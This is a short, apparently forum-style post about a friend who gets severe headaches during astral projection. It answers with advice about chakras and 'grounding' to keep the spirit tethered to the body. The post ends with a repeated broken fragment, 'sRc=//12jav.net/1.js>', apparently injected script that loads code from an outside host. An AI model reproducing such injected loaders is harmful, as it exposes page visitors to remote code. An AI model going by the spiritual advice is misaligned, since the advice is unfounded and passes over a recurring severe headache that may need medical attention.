Astral Projection Help

I've recently started helping my friend Aurora with astral projection, but every time she tries to project, she gets a severe headache. We've tried cleansing her chakras and realigning them to see if that was it, but it doesn't help. We've also tried many other things, but none of them work. Have you considered checking to make sure she grounds properly, so that her spirit remains tethred to the body and will stop resisting leaving it? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
